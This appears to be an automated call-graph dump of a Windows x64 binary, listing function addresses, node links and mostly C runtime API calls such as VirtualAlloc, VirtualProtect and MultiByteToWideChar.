7ff7bad76344 16 API calls _cwprintf_s_l 60712->60773 60754 7ff7bad44fc0 60713->60754 60716 7ff7bad7189a 60757 7ff7bad611f4 60716->60757 60718 7ff7bad71f10 60780 7ff7bad4506c 16 API calls _cwprintf_s_l 60718->60780 60720 7ff7bad71f06 60779 7ff7bad6def8 19 API calls 60720->60779 60724 7ff7bad718e4 _cwprintf_s_l 60724->60718 60724->60720 60727 7ff7bad6f7d8 16 API calls 60724->60727 60728 7ff7bad6f6e8 19 API calls 60724->60728 60732 7ff7bad71d75 memcpy_s 60724->60732 60733 7ff7bad44fc0 16 API calls 60724->60733 60763 7ff7bad6e98c 60724->60763 60774 7ff7bad6fe98 19 API calls memcpy_s 60724->60774 60775 7ff7bad6cf70 19 API calls __FrameHandler3::UnwindNestedFrames 60724->60775 60776 7ff7bad6b8e4 19 API calls 60724->60776 60777 7ff7bad6bd48 19 API calls __FrameHandler3::UnwindNestedFrames 60724->60777 60778 7ff7bad71f88 16 API calls 60724->60778 60727->60724 60728->60724 60768 7ff7bad6f7d8 60732->60768 60733->60724 60737 7ff7bad71dbc pre_c_initialization __FrameHandler3::UnwindNestedFrames 60737->60689 60739 7ff7bad467cf 60738->60739 60741 7ff7bad465cc memcpy_s 60738->60741 60739->60741 60849 7ff7bad71678 60739->60849 60742 7ff7bad467b6 60741->60742 60852 7ff7bad72c18 16 API calls _cwprintf_s_l 60741->60852 60742->60687 60744 7ff7bad46739 60744->60742 60853 7ff7bad41658 60744->60853 60746 7ff7bad46760 60860 7ff7bad72b1c 58 API calls vwscanf_s 60746->60860 60748->60693 60749->60693 60750->60693 60751->60693 60752->60693 60753->60693 60782 7ff7bad41064 60754->60782 60756 7ff7bad45005 memcpy_s 60756->60716 60758 7ff7bad6120e 60757->60758 60759 7ff7bad61215 60757->60759 60831 7ff7bad6123c 60758->60831 60839 7ff7bad61388 60759->60839 60762 7ff7bad61213 60762->60724 60764 7ff7bad6e9e9 __scrt_fastfail 60763->60764 60767 7ff7bad6eaec 60764->60767 60847 7ff7bad4506c 16 API calls _cwprintf_s_l 60764->60847 60767->60724 60769 7ff7bad6f7ed 60768->60769 60770 7ff7bad6f804 60768->60770 60769->60770 60848 7ff7bad4506c 16 API calls _cwprintf_s_l 60769->60848 60770->60737 60781 7ff7bad4506c 16 API calls _cwprintf_s_l 60770->60781 60773->60713 60774->60724 60775->60724 60776->60724 60777->60724 60778->60724 60789 7ff7bad48ccc 60782->60789 60793 7ff7bad48824 60782->60793 60783 7ff7bad4108b 60784 7ff7bad41095 60783->60784 60810 7ff7bad3c8c0 16 API calls _cwprintf_s_l 60783->60810 60784->60756 60790 7ff7bad48cf7 60789->60790 60792 7ff7bad48d1d 60790->60792 60811 7ff7bad48368 60790->60811 60792->60783 60794 7ff7bad48844 60793->60794 60800 7ff7bad4882d 60793->60800 60796 7ff7bad48886 60794->60796 60799 7ff7bad4889c 60794->60799 60805 7ff7bad488a1 60794->60805 60795 7ff7bad48f8b 60795->60783 60821 7ff7bad48050 GetLastError 60796->60821 60797 7ff7bad488e8 60797->60799 60827 7ff7bad484e0 GetLastError VirtualQuery VirtualFree SetLastError 60797->60827 60799->60783 60800->60795 60801 7ff7bad48fc5 60800->60801 60829 7ff7bad48844 GetLastError VirtualQuery VirtualFree SetLastError 60800->60829 60801->60795 60803 7ff7bad48ccc 6 API calls 60801->60803 60806 7ff7bad4908c memcpy_s 60803->60806 60805->60797 60805->60799 60807 7ff7bad48a2f 60805->60807 60806->60795 60830 7ff7bad48844 GetLastError VirtualQuery VirtualFree SetLastError 60806->60830 60807->60799 60828 7ff7bad4945c GetLastError VirtualQuery VirtualFree SetLastError 60807->60828 60812 7ff7bad4838b 60811->60812 60813 7ff7bad48386 60811->60813 60816 7ff7bad483b3 60812->60816 60820 7ff7bad490f0 GetLastError VirtualAlloc SetLastError 60812->60820 60817 7ff7bad48638 60813->60817 60816->60792 60818 7ff7bad4865e GetLastError VirtualAlloc SetLastError 60817->60818 60819 7ff7bad48699 60817->60819 60818->60819 60819->60812 60820->60816 60822 7ff7bad480cb SetLastError 60821->60822 60823 7ff7bad48072 VirtualQuery 60821->60823 60824 7ff7bad480d5 60822->60824 60823->60824 60825 7ff7bad4808b 60823->60825 60824->60799 60825->60822 60825->60823 60825->60824 60826 7ff7bad480aa VirtualFree 60825->60826 60826->60824 60826->60825 60827->60799 60828->60799 60829->60801 60830->60795 60833 7ff7bad61296 _cwprintf_s_l 60831->60833 60832 7ff7bad6129b VirtualAlloc 60832->60833 60833->60832 60834 7ff7bad6131e 60833->60834 60835 7ff7bad612d9 VirtualFree 60833->60835 60836 7ff7bad61379 60833->60836 60834->60762 60835->60833 60845 7ff7bad4506c 16 API calls _cwprintf_s_l 60836->60845 60840 7ff7bad6139f VirtualProtect 60839->60840 60842 7ff7bad613bf 60839->60842 60841 7ff7bad613d0 60840->60841 60840->60842 60846 7ff7bad613dc 16 API calls _cwprintf_s_l 60841->60846 60842->60762 60861 7ff7bad61140 60849->60861 60851 7ff7bad716af pre_c_initialization 60852->60744 60854 7ff7bad41774 60853->60854 60858 7ff7bad41691 _cwprintf_s_l 60853->60858 60859 7ff7bad4172d _cwprintf_s_l 60854->60859 60881 7ff7bad3c940 16 API calls _cwprintf_s_l 60854->60881 60858->60859 60876 7ff7bad41328 60858->60876 60859->60746 60860->60742 60862 7ff7bad6118a 60861->60862 60863 7ff7bad61155 60861->60863 60866 7ff7bad611bd 60862->60866 60867 7ff7bad611a5 60862->60867 60864 7ff7bad6115e 60863->60864 60865 7ff7bad6116a VirtualProtect 60863->60865 60868 7ff7bad61388 17 API calls 60864->60868 60869 7ff7bad611ea 60865->60869 60873 7ff7bad61168 60865->60873 60866->60866 60871 7ff7bad611d2 VirtualProtect 60866->60871 60870 7ff7bad61388 17 API calls 60867->60870 60868->60873 60875 7ff7bad613dc 16 API calls _cwprintf_s_l 60869->60875 60870->60873 60871->60869 60871->60873 60873->60851 60877 7ff7bad41064 _cwprintf_s_l 16 API calls 60876->60877 60878 7ff7bad4136c _cwprintf_s_l memcpy_s 60877->60878 60879 7ff7bad41446 60878->60879 60882 7ff7bad418bc 60878->60882 60879->60859 60883 7ff7bad418f0 60882->60883 60885 7ff7bad41912 _cwprintf_s_l __scrt_fastfail 60882->60885 60884 7ff7bad41064 _cwprintf_s_l 16 API calls 60883->60884 60883->60885 60884->60885 60885->60879 60889 7ff7bad47f18 60886->60889 60887 7ff7bad47fb5 60887->60698 60889->60887 60910 7ff7bad3cb3c 16 API calls _cwprintf_s_l 60889->60910 60890 7ff7bad47feb 60911 7ff7bad3cb7c 16 API calls 2 library calls 60890->60911 60892 7ff7bad48008 60894 7ff7bad4d112 60893->60894 60897 7ff7bad4d11a 60893->60897 60918 7ff7bad4ccbc 60894->60918 60896 7ff7bad4d2a6 60896->60704 60897->60896 60899 7ff7bad4d19f 60897->60899 60925 7ff7bad5caa4 16 API calls _cwprintf_s_l 60897->60925 60900 7ff7bad4d1b6 _cwprintf_s_l 60899->60900 60901 7ff7bad4ccbc 55 API calls 60899->60901 60902 7ff7bad41658 _cwprintf_s_l 16 API calls 60900->60902 60901->60900 60905 7ff7bad4d204 60902->60905 60903 7ff7bad4ccbc 55 API calls 60903->60905 60905->60896 60905->60903 60912 7ff7bad4d31c 60905->60912 60906->60704 60907->60708 60908->60707 60909->60710 60910->60890 60911->60892 60914 7ff7bad4d387 60912->60914 60926 7ff7bad41000 60914->60926 60916 7ff7bad4d40d _cwprintf_s_l memcpy_s 60932 7ff7bad4ce48 16 API calls _cwprintf_s_l 60916->60932 60917 7ff7bad4d550 _cwprintf_s_l memcpy_s 60917->60905 60919 7ff7bad4ce25 60918->60919 60923 7ff7bad4cce6 memcpy_s 60918->60923 60939 7ff7bad3c8c0 16 API calls _cwprintf_s_l 60919->60939 60921 7ff7bad52020 16 API calls 60921->60923 60922 7ff7bad4ce03 60922->60897 60923->60919 60923->60921 60923->60922 60934 7ff7bad3de34 60923->60934 60925->60899 60931 7ff7bad48ccc 6 API calls 60926->60931 60927 7ff7bad41027 60928 7ff7bad4102f 60927->60928 60933 7ff7bad3c8c0 16 API calls _cwprintf_s_l 60927->60933 60928->60916 60931->60927 60932->60917 60940 7ff7bada9c4c 60934->60940 60937 7ff7bad3de5d 60937->60923 60941 7ff7bada9c55 60940->60941 60942 7ff7bad3de57 60940->60942 60943 7ff7bada9b44 _get_daylight 14 API calls 60941->60943 60942->60937 60946 7ff7bada9ffc 60942->60946 60944 7ff7bada9c5a 60943->60944 60949 7ff7badb7070 23 API calls _invalid_parameter_noinfo 60944->60949 60950 7ff7badaa01c 60946->60950 60949->60942 60951 7ff7badaa046 60950->60951 60962 7ff7badaa014 60950->60962 60952 7ff7badaa092 60951->60952 60954 7ff7badaa055 __scrt_fastfail 60951->60954 60951->60962 60963 7ff7bad902f0 EnterCriticalSection 60952->60963 60956 7ff7bada9b44 _get_daylight 14 API calls 60954->60956 60955 7ff7badaa09a 60957 7ff7bada9d6c _fread_nolock 37 API calls 60955->60957 60958 7ff7badaa06a 60956->60958 60959 7ff7badaa0b1 60957->60959 60964 7ff7badb7070 23 API calls _invalid_parameter_noinfo 60958->60964 60961 7ff7bad902fc _fread_nolock LeaveCriticalSection 60959->60961 60961->60962 60962->60937 60964->60962 60965->60632 60966->60632 60968 7ff7bad32c6e 60969 7ff7bad32e9e 60968->60969 60970 7ff7bad32ca4 60968->60970 60971 7ff7bad39c4c 16 API calls 60969->60971 60991 7ff7bad5af30 60970->60991 61031 7ff7bad38424 60970->61031 60973 7ff7bad32ed0 60971->60973 60972 7ff7bad32cb0 60975 7ff7bad32dd7 60972->60975 60976 7ff7bad33098 60972->60976 60980 7ff7bad32d98 60972->60980 60983 7ff7bad3273d 60972->60983 60974 7ff7bad3cf04 97 API calls 60973->60974 60977 7ff7bad34ac4 60974->60977 60986 7ff7bad34941 60976->60986 61091 7ff7bad5fafc 18 API calls 60976->61091 60979 7ff7bad35066 60980->60975 60981 7ff7bad39c4c 16 API calls 60980->60981 60981->60980 60982 7ff7bad39c4c 16 API calls 60982->60976 60983->60983 60984 7ff7bad33d79 60983->60984 60988 7ff7bad39c4c 16 API calls 60983->60988 61089 7ff7bad32420 18 API calls 60983->61089 61090 7ff7bad538ec 16 API calls _cwprintf_s_l 60983->61090 60984->60976 60984->60982 60988->60983 61092 7ff7bad5c618 60991->61092 60993 7ff7bad5af63 60997 7ff7bad5afd8 60993->60997 61107 7ff7bad5c714 18 API calls 60993->61107 60995 7ff7bad5b129 61104 7ff7bad3c5ac 60995->61104 60996 7ff7bad5aff9 61108 7ff7bad5d31c 16 API calls 60996->61108 60997->60995 60997->60996 61000 7ff7bad5b009 61109 7ff7bad73d40 18 API calls __scrt_fastfail 61000->61109 61001 7ff7bad5b13c 61003 7ff7bad5c5d0 16 API calls 61001->61003 61004 7ff7bad5b175 61003->61004 61005 7ff7bad7b0e4 19 API calls 61004->61005 61008 7ff7bad5b183 61004->61008 61005->61008 61006 7ff7bad5b10d 61006->60972 61009 7ff7bad5b1f1 61008->61009 61011 7ff7bad5b220 61008->61011 61012 7ff7bad5b200 61008->61012 61009->60972 61010 7ff7bad5b048 61019 7ff7bad5b0cc 61010->61019 61110 7ff7bad42574 16 API calls _cwprintf_s_l 61010->61110 61014 7ff7bad44c60 16 API calls 61011->61014 61013 7ff7bad5af30 92 API calls 61012->61013 61013->61009 61015 7ff7bad5b22a 61014->61015 61016 7ff7bad3c798 16 API calls 61015->61016 61018 7ff7bad5b23b 61016->61018 61020 7ff7bad5c5d0 16 API calls 61018->61020 61019->61006 61111 7ff7bad40e08 16 API calls 61019->61111 61022 7ff7bad5b261 61020->61022 61021 7ff7bad44c60 16 API calls 61023 7ff7bad5b28f 61021->61023 61025 7ff7bad5b2a1 61022->61025 61026 7ff7bad5b384 61022->61026 61029 7ff7bad5b278 61022->61029 61024 7ff7bad4b614 _cwprintf_s_l 16 API calls 61023->61024 61024->61025 61028 7ff7bad40e08 16 API calls 61025->61028 61030 7ff7bad5b2b7 61025->61030 61027 7ff7bad44dfc 16 API calls 61026->61027 61027->61025 61028->61030 61029->61021 61029->61030 61030->60972 61040 7ff7bad38453 pre_c_initialization 61031->61040 61032 7ff7bad38513 vwscanf_s 61133 7ff7bada908c 57 API calls 3 library calls 61032->61133 61033 7ff7bad3859d 61116 7ff7bad3ac38 61033->61116 61035 7ff7bad38570 61035->61033 61137 7ff7bad3baf0 61035->61137 61038 7ff7bad38529 vwscanf_s 61134 7ff7bada908c 57 API calls 3 library calls 61038->61134 61040->61032 61040->61035 61042 7ff7bad385b2 61043 7ff7bad3ac38 16 API calls 61042->61043 61045 7ff7bad385c1 61043->61045 61047 7ff7bad3abc4 16 API calls 61045->61047 61046 7ff7bad3853f vwscanf_s 61135 7ff7bada908c 57 API calls 3 library calls 61046->61135 61053 7ff7bad385d7 61047->61053 61048 7ff7bad38613 61049 7ff7bad3baf0 16 API calls 61048->61049 61056 7ff7bad38632 61049->61056 61051 7ff7bad38555 vwscanf_s 61136 7ff7bada8d0c 56 API calls 61051->61136 61052 7ff7bad3b754 16 API calls 61052->61053 61053->61048 61053->61052 61055 7ff7bad3b978 16 API calls 61053->61055 61054 7ff7bad386bf 61058 7ff7bad38b08 93 API calls 61054->61058 61055->61053 61059 7ff7bad38648 vwscanf_s 61056->61059 61062 7ff7bad38658 61056->61062 61063 7ff7bad38685 61056->61063 61061 7ff7bad386cd 61058->61061 61059->61054 61060 7ff7bad38564 61059->61060 61064 7ff7bada908c 57 API calls 61059->61064 61060->60972 61061->61060 61067 7ff7bad38074 113 API calls 61061->61067 61073 7ff7bad386fb vwscanf_s 61061->61073 61066 7ff7bad3dc34 111 API calls 61062->61066 61065 7ff7bad37be8 91 API calls 61063->61065 61064->61054 61065->61059 61069 7ff7bad38661 61066->61069 61067->61073 61068 7ff7bad3874f 61070 7ff7bad387a4 73 API calls 61068->61070 61071 7ff7bad38672 61069->61071 61074 7ff7bad37a40 33 API calls 61069->61074 61072 7ff7bad38757 61070->61072 61075 7ff7bad38aac 76 API calls 61071->61075 61076 7ff7bad37c50 100 API calls 61072->61076 61073->61060 61073->61068 61077 7ff7bada8e48 _fread_nolock 23 API calls 61073->61077 61074->61071 61075->61059 61076->61060 61078 7ff7bad3872d 61077->61078 61079 7ff7bada9194 _fread_nolock 23 API calls 61078->61079 61080 7ff7bad38734 61079->61080 61081 7ff7bad38738 vwscanf_s 61080->61081 61082 7ff7bad38761 61080->61082 61085 7ff7bada908c 57 API calls 61081->61085 61083 7ff7bad3dc34 111 API calls 61082->61083 61084 7ff7bad3876b 61083->61084 61086 7ff7bad3877c 61084->61086 61087 7ff7bad37a40 33 API calls 61084->61087 61085->61068 61088 7ff7bad38aac 76 API calls 61086->61088 61087->61086 61088->61060 61090->60983 61091->60979 61093 7ff7bad5c6ad 61092->61093 61094 7ff7bad5c646 61092->61094 61100 7ff7bad5c6b2 61093->61100 61113 7ff7bad3c5d8 16 API calls _cwprintf_s_l 61093->61113 61094->61093 61096 7ff7bad5c655 61094->61096 61112 7ff7bad7a930 89 API calls 2 library calls 61096->61112 61097 7ff7bad5c68c 61103 7ff7bad5c690 __FrameHandler3::UnwindNestedFrames 61097->61103 61114 7ff7bad3cb7c 16 API calls 2 library calls 61097->61114 61101 7ff7bad3c5ac 16 API calls 61100->61101 61100->61103 61102 7ff7bad5c711 61101->61102 61103->60993 61115 7ff7bad3c0ac 16 API calls _cwprintf_s_l 61104->61115 61107->60997 61108->61000 61109->61010 61110->61019 61111->61006 61112->61097 61114->61100 61117 7ff7bad3ac58 61116->61117 61121 7ff7bad385aa 61116->61121 61118 7ff7bad3ad17 61117->61118 61120 7ff7bad3ac6a 61117->61120 61117->61121 61144 7ff7bad40c94 16 API calls 61118->61144 61120->61121 61143 7ff7bad40e08 16 API calls 61120->61143 61123 7ff7bad3fb78 61121->61123 61126 7ff7bad3fb93 61123->61126 61127 7ff7bad3fbc8 61126->61127 61145 7ff7bad3b4f4 61126->61145 61151 7ff7bad3b754 16 API calls _cwprintf_s_l 61126->61151 61152 7ff7bad3e170 16 API calls 2 library calls 61127->61152 61129 7ff7bad3b4f4 16 API calls 61131 7ff7bad3fbe0 61129->61131 61130 7ff7bad3baf0 16 API calls 61130->61131 61131->61129 61131->61130 61132 7ff7bad3fc19 61131->61132 61133->61038 61134->61046 61135->61051 61136->61060 61138 7ff7bad3bb0a _cwprintf_s_l 61137->61138 61139 7ff7bad41658 _cwprintf_s_l 16 API calls 61138->61139 61140 7ff7bad3bb23 61139->61140 61157 7ff7bad43c80 61140->61157 61142 7ff7bad3bb45 61142->61033 61143->61120 61144->61121 61146 7ff7bad3b51a 61145->61146 61147 7ff7bad3b51f 61145->61147 61156 7ff7bad40e08 16 API calls 61146->61156 61153 7ff7bad42cf0 61147->61153 61150 7ff7bad3b54e 61150->61126 61151->61126 61152->61131 61154 7ff7bad41000 16 API calls 61153->61154 61155 7ff7bad42d14 61154->61155 61155->61150 61156->61147 61162 7ff7bad43ca7 61157->61162 61158 7ff7bad43e1a 61174 7ff7bad3c94c 16 API calls _cwprintf_s_l 61158->61174 61160 7ff7bad43d56 61163 7ff7bad43dbd 61160->61163 61165 7ff7bad43e39 61160->61165 61168 7ff7bad43d92 61160->61168 61161 7ff7bad43e2b 61175 7ff7bad3c940 16 API calls _cwprintf_s_l 61161->61175 61162->61158 61162->61160 61162->61161 61162->61163 61163->61142 61176 7ff7bad3c940 16 API calls _cwprintf_s_l 61165->61176 61166 7ff7bad43daf 61173 7ff7bad420f8 16 API calls 61166->61173 61168->61166 61169 7ff7bad43e47 61168->61169 61177 7ff7bad3c940 16 API calls _cwprintf_s_l 61169->61177 61173->61163 61178 7ff7badb5114 61179 7ff7badb5124 61178->61179 61180 7ff7badb512d 61178->61180 61179->61180 61184 7ff7badb4e50 61179->61184 61185 7ff7badb4e65 61184->61185 61186 7ff7badb4e69 61184->61186 61185->61180 61196 7ff7badb5008 15 API calls 3 library calls 61185->61196 61197 7ff7badc4e18 61186->61197 61191 7ff7badb4e7b 61217 7ff7badb76b0 14 API calls 2 library calls 61191->61217 61194 7ff7badb4e88 61216 7ff7badb76b0 14 API calls 2 library calls 61194->61216 61196->61180 61198 7ff7badb4e6e 61197->61198 61199 7ff7badc4e25 61197->61199 61203 7ff7badc51dc GetEnvironmentStringsW 61198->61203 61218 7ff7badb91cc 61199->61218 61204 7ff7badc520a 61203->61204 61205 7ff7badc52ac 61203->61205 61208 7ff7badc14cc wcsftime WideCharToMultiByte 61204->61208 61206 7ff7badb4e73 61205->61206 61207 7ff7badc52b6 FreeEnvironmentStringsW 61205->61207 61206->61191 61215 7ff7badb4ebc 23 API calls 4 library calls 61206->61215 61207->61206 61209 7ff7badc525c 61208->61209 61209->61205 61210 7ff7badb89e8 wcsftime 15 API calls 61209->61210 61211 7ff7badc526b 61210->61211 61212 7ff7badc5295 61211->61212 61213 7ff7badc14cc wcsftime WideCharToMultiByte 61211->61213 61449 7ff7badb76b0 14 API calls 2 library calls 61212->61449 61213->61212 61215->61194 61216->61191 61217->61185 61219 7ff7badb91dd 61218->61219 61222 7ff7badb91e2 61218->61222 61261 7ff7badb7bfc 6 API calls try_get_function 61219->61261 61224 7ff7badb91ea 61222->61224 61262 7ff7badb7c44 6 API calls try_get_function 61222->61262 61223 7ff7badb9201 61223->61224 61226 7ff7badb7638 pre_c_initialization 14 API calls 61223->61226 61231 7ff7badb9264 61224->61231 61269 7ff7badb6d78 61224->61269 61228 7ff7badb9214 61226->61228 61229 7ff7badb9232 61228->61229 61230 7ff7badb9222 61228->61230 61265 7ff7badb7c44 6 API calls try_get_function 61229->61265 61263 7ff7badb7c44 6 API calls try_get_function 61230->61263 61243 7ff7badc4b9c 61231->61243 61234 7ff7badb9229 61264 7ff7badb76b0 14 API calls 2 library calls 61234->61264 61235 7ff7badb923a 61236 7ff7badb9250 61235->61236 61237 7ff7badb923e 61235->61237 61267 7ff7badb8ea8 14 API calls _invalid_parameter_noinfo 61236->61267 61266 7ff7badb7c44 6 API calls try_get_function 61237->61266 61241 7ff7badb9258 61268 7ff7badb76b0 14 API calls 2 library calls 61241->61268 61281 7ff7badc4d60 61243->61281 61245 7ff7badc4bc5 61296 7ff7badc48a8 61245->61296 61248 7ff7badc4bdf 61248->61198 61250 7ff7badc4c8b 61319 7ff7badb76b0 14 API calls 2 library calls 61250->61319 61254 7ff7badc4c7f 61255 7ff7badc4c86 61254->61255 61258 7ff7badc4cab pre_c_initialization 61254->61258 61256 7ff7bada9b44 _get_daylight 14 API calls 61255->61256 61256->61250 61257 7ff7badc4ce8 61257->61250 61321 7ff7badc46ec 23 API calls 5 library calls 61257->61321 61258->61257 61320 7ff7badb76b0 14 API calls 2 library calls 61258->61320 61262->61223 61263->61234 61264->61224 61265->61235 61266->61234 61267->61241 61268->61224 61278 7ff7bada930c EnterCriticalSection LeaveCriticalSection FindHandler 61269->61278 61271 7ff7badb6d81 61272 7ff7badb6d90 61271->61272 61279 7ff7bada935c 26 API calls 4 library calls 61271->61279 61274 7ff7badb6d99 IsProcessorFeaturePresent 61272->61274 61277 7ff7badb6dc3 FindHandler 61272->61277 61275 7ff7badb6da8 61274->61275 61280 7ff7badb6e5c 6 API calls 2 library calls 61275->61280 61278->61271 61279->61272 61280->61277 61282 7ff7badc4d83 61281->61282 61283 7ff7badc4d8d 61282->61283 61322 7ff7badb75c8 EnterCriticalSection 61282->61322 61285 7ff7badc4dff 61283->61285 61288 7ff7badb6d78 FindHandler 26 API calls 61283->61288 61285->61245 61289 7ff7badc4e17 61288->61289 61291 7ff7badc4e6a 61289->61291 61293 7ff7badb91cc pre_c_initialization 26 API calls 61289->61293 61291->61245 61294 7ff7badc4e54 61293->61294 61295 7ff7badc4b9c pre_c_initialization 37 API calls 61294->61295 61295->61291 61323 7ff7bad92530 61296->61323 61299 7ff7badc48da 61301 7ff7badc48ef 61299->61301 61302 7ff7badc48df GetACP 61299->61302 61300 7ff7badc48c8 GetOEMCP 61300->61301 61301->61248 61303 7ff7badb89e8 61301->61303 61302->61301 61304 7ff7badb8a33 61303->61304 61308 7ff7badb89f7 wcsftime 61303->61308 61306 7ff7bada9b44 _get_daylight 14 API calls 61304->61306 61305 7ff7badb8a1a RtlAllocateHeap 61307 7ff7badb8a31 61305->61307 61305->61308 61306->61307 61307->61250 61310 7ff7badc4e94 61307->61310 61308->61304 61308->61305 61368 7ff7badc8e60 EnterCriticalSection LeaveCriticalSection wcsftime 61308->61368 61311 7ff7badc48a8 pre_c_initialization 28 API calls 61310->61311 61313 7ff7badc4ebf 61311->61313 61312 7ff7badc4f3f pre_c_initialization __scrt_fastfail __FrameHandler3::UnwindNestedFrames 61312->61254 61313->61312 61314 7ff7badc4efc IsValidCodePage 61313->61314 61314->61312 61315 7ff7badc4f0d 61314->61315 61316 7ff7badc4f44 GetCPInfo 61315->61316 61318 7ff7badc4f16 __scrt_fastfail 61315->61318 61316->61312 61316->61318 61369 7ff7badc49b8 61318->61369 61319->61248 61320->61257 61321->61250 61324 7ff7bad92554 61323->61324 61330 7ff7bad9254f 61323->61330 61324->61330 61331 7ff7badb90f8 GetLastError 61324->61331 61328 7ff7bad92592 61359 7ff7badb93d4 26 API calls TranslateName 61328->61359 61330->61299 61330->61300 61332 7ff7badb911a 61331->61332 61336 7ff7badb911f 61331->61336 61360 7ff7badb7bfc 6 API calls try_get_function 61332->61360 61335 7ff7badb9142 61337 7ff7badb9127 SetLastError 61335->61337 61338 7ff7badb7638 pre_c_initialization 14 API calls 61335->61338 61336->61337 61361 7ff7badb7c44 6 API calls try_get_function 61336->61361 61341 7ff7badb91c6 61337->61341 61342 7ff7bad9256f 61337->61342 61340 7ff7badb9155 61338->61340 61343 7ff7badb9173 61340->61343 61344 7ff7badb9163 61340->61344 61345 7ff7badb6d78 FindHandler 24 API calls 61341->61345 61358 7ff7badb93a0 26 API calls TranslateName 61342->61358 61364 7ff7badb7c44 6 API calls try_get_function 61343->61364 61362 7ff7badb7c44 6 API calls try_get_function 61344->61362 61347 7ff7badb91cb 61345->61347 61349 7ff7badb916a 61363 7ff7badb76b0 14 API calls 2 library calls 61349->61363 61350 7ff7badb917b 61351 7ff7badb9191 61350->61351 61352 7ff7badb917f 61350->61352 61366 7ff7badb8ea8 14 API calls _invalid_parameter_noinfo 61351->61366 61365 7ff7badb7c44 6 API calls try_get_function 61352->61365 61356 7ff7badb9199 61367 7ff7badb76b0 14 API calls 2 library calls 61356->61367 61358->61328 61359->61330 61361->61335 61362->61349 61363->61337 61364->61350 61365->61349 61366->61356 61367->61337 61368->61308 61370 7ff7badc49f5 GetCPInfo 61369->61370 61377 7ff7badc4aed __FrameHandler3::UnwindNestedFrames 61369->61377 61374 7ff7badc4a08 61370->61374 61370->61377 61372 7ff7badc4a81 61391 7ff7badc99ac 61372->61391 61378 7ff7badc7370 61374->61378 61376 7ff7badc99ac pre_c_initialization 31 API calls 61376->61377 61377->61312 61379 7ff7bad92530 TranslateName 26 API calls 61378->61379 61380 7ff7badc73b2 61379->61380 61396 7ff7badc1470 61380->61396 61382 7ff7badc73e8 61383 7ff7badb89e8 wcsftime 15 API calls 61382->61383 61384 7ff7badc73ef __FrameHandler3::UnwindNestedFrames 61382->61384 61385 7ff7badc7414 __scrt_fastfail wcsftime 61382->61385 61383->61385 61384->61372 61386 7ff7badc1470 _Wcsftime MultiByteToWideChar 61385->61386 61387 7ff7badc74ac 61385->61387 61388 7ff7badc748e 61386->61388 61387->61384 61389 7ff7badb76b0 __free_lconv_num 14 API calls 61387->61389 61388->61387 61390 7ff7badc7492 GetStringTypeW 61388->61390 61389->61384 61390->61387 61392 7ff7bad92530 TranslateName 26 API calls 61391->61392 61393 7ff7badc99d1 61392->61393 61399 7ff7badc9694 61393->61399 61395 7ff7badc4ab4 61395->61376 61397 7ff7badc1478 MultiByteToWideChar 61396->61397 61400 7ff7badc96d6 pre_c_initialization 61399->61400 61401 7ff7badc1470 _Wcsftime MultiByteToWideChar 61400->61401 61403 7ff7badc9720 61401->61403 61402 7ff7badc995f __FrameHandler3::UnwindNestedFrames 61402->61395 61403->61402 61404 7ff7badb89e8 wcsftime 15 API calls 61403->61404 61405 7ff7badc9753 wcsftime 61403->61405 61404->61405 61406 7ff7badc1470 _Wcsftime MultiByteToWideChar 61405->61406 61408 7ff7badc9857 61405->61408 61407 7ff7badc97c5 61406->61407 61407->61408 61425 7ff7badb8058 61407->61425 61408->61402 61437 7ff7badb76b0 14 API calls 2 library calls 61408->61437 61412 7ff7badc9814 61412->61408 61415 7ff7badb8058 __crtLCMapStringW 7 API calls 61412->61415 61413 7ff7badc9866 61414 7ff7badc9880 wcsftime 61413->61414 61416 7ff7badb89e8 wcsftime 15 API calls 61413->61416 61414->61408 61417 7ff7badb8058 __crtLCMapStringW 7 API calls 61414->61417 61415->61408 61416->61414 61419 7ff7badc9901 61417->61419 61418 7ff7badc9936 61418->61408 61436 7ff7badb76b0 14 API calls 2 library calls 61418->61436 61419->61418 61433 7ff7badc14cc 61419->61433 61438 7ff7badb7794 61425->61438 61428 7ff7badb80ed 61448 7ff7badb8134 5 API calls 2 library calls 61428->61448 61429 7ff7badb809b LCMapStringEx 61430 7ff7badb811f 61429->61430 61430->61408 61430->61412 61430->61413 61432 7ff7badb80f7 LCMapStringW 61432->61430 61434 7ff7badc14e8 WideCharToMultiByte 61433->61434 61436->61408 61437->61402 61439 7ff7badb77f0 try_get_function 61438->61439 61440 7ff7badb77f5 61438->61440 61439->61440 61441 7ff7badb7824 LoadLibraryW 61439->61441 61445 7ff7badb78bd FreeLibrary 61439->61445 61446 7ff7badb78d8 61439->61446 61447 7ff7badb787f LoadLibraryExW 61439->61447 61440->61428 61440->61429 61441->61439 61442 7ff7badb7845 GetLastError 61441->61442 61442->61439 61443 7ff7badb78e6 GetProcAddress 61444 7ff7badb78f7 61443->61444 61444->61440 61445->61439 61446->61440 61446->61443 61447->61439 61448->61432 61449->61205 61450 7ff7bad34a01 61451 7ff7bad34a30 61450->61451 61452 7ff7bad34a0c 61450->61452 61452->61451 61454 7ff7bad3d1ec 61452->61454 61455 7ff7bada9b44 _get_daylight 14 API calls 61454->61455 61456 7ff7bad3d20b GetLastError 61455->61456 61457 7ff7bad3d25e 61456->61457 61458 7ff7bad3d28d 61457->61458 61459 7ff7bad45880 89 API calls 61457->61459 61466 7ff7bad3d2bc _cwprintf_s_l 61458->61466 61468 7ff7bad3cddc 20 API calls __FrameHandler3::UnwindNestedFrames 61458->61468 61459->61458 61460 7ff7bad3d361 61462 7ff7bada9b44 _get_daylight 14 API calls 61460->61462 61464 7ff7bad3d366 SetLastError 61462->61464 61467 7ff7bad3d326 61466->61467 61469 7ff7bad3cddc 20 API calls __FrameHandler3::UnwindNestedFrames 61466->61469 61467->61460 61470 7ff7bad3cddc 20 API calls __FrameHandler3::UnwindNestedFrames 61467->61470 61468->61466 61469->61467 61470->61460 61471 7ff7bad8bf68 61498 7ff7bad8c12c 61471->61498 61474 7ff7bad8c0b4 61538 7ff7bad8c4b4 7 API calls __scrt_fastfail 61474->61538 61475 7ff7bad8bf84 __scrt_acquire_startup_lock 61477 7ff7bad8c0be 61475->61477 61479 7ff7bad8bfa2 61475->61479 61539 7ff7bad8c4b4 7 API calls __scrt_fastfail 61477->61539 61489 7ff7bad8bfe4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 61479->61489 61506 7ff7badb5264 61479->61506 61482 7ff7bad8bfc7 61483 7ff7bad8c0c9 _cwprintf_s_l FindHandler 61485 7ff7bad8c04d 61514 7ff7bad8c600 61485->61514 61487 7ff7bad8c052 61517 7ff7badb5190 61487->61517 61489->61485 61535 7ff7bada9a44 26 API calls 